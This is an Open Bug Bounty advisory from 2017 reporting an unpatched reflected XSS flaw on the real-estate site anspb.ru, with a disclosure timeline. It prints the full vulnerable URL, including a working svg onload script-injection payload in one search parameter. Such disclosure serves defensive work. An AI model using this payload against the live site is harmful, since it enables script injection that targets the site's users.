anspb.ru XSS vulnerability

2017-08-05T13:31:00
ID OBB:276045
Type openbugbounty
Reporter M0r3h4x
Modified 2017-11-03T14:40:00

Description

Vulnerable URL:
https://anspb.ru/ajaxdata/obj_find.php?v=2&r;=1&a;=10;&StreetNameTr;=xss%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&StreetType;=street&adv;=0&p;=&s;=&pmin;=&pmax;=&smin;=&smax;=&srmin;=&srmax;=&skmin;=&skmax;=&semin;=&semax;=&plmin;=&plmax;=&lcmin;=&lcmax;=&d;=&m;=&t;=&tco;=&fav;=&ht;=&lvl;=&for;=&wd;=&tl;=&so;=&pp1;=&pp2;=&mc;=&mz;=&UrSt;=&UrStLand;=&floormin;=&floormax;=&floormin1;=&floormax1;=&oid;=&minrentmetr;=&amountDay;=&selHouseType;=&selDecorType;=&selObjSrok;=&dev;=&complex;=&GroupComplexName;=&ReLimit;=&novtype;=&ComplexId;=&selBlocks;=&GetComplexNameTr;=&devtrname;=&complextrname;=&orderflat;=&nolimit;=&onlyads;=&disableads;=0&complexmaps;=&rent;_comission=&GroupComplexNameTr;=&CityNameTr;=&CityType;=&adt;=&assignment;=&counter;=1&StreetName;=%D0%9E%D1%81%D0%B8%D0%BF%D0%B5%D0%BD%D0%BA%D0%BE&nomoreads;=1&AddComplex;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 03.11.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 528517
VIP website status:| No
Check anspb.ru SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 August, 2017 13:31 GMT
Generic security notifications sent to website owner| 7 August, 2017 15:20 GMT
Vulnerability details disclosed by researcher| 3 November, 2017 14:40 GMT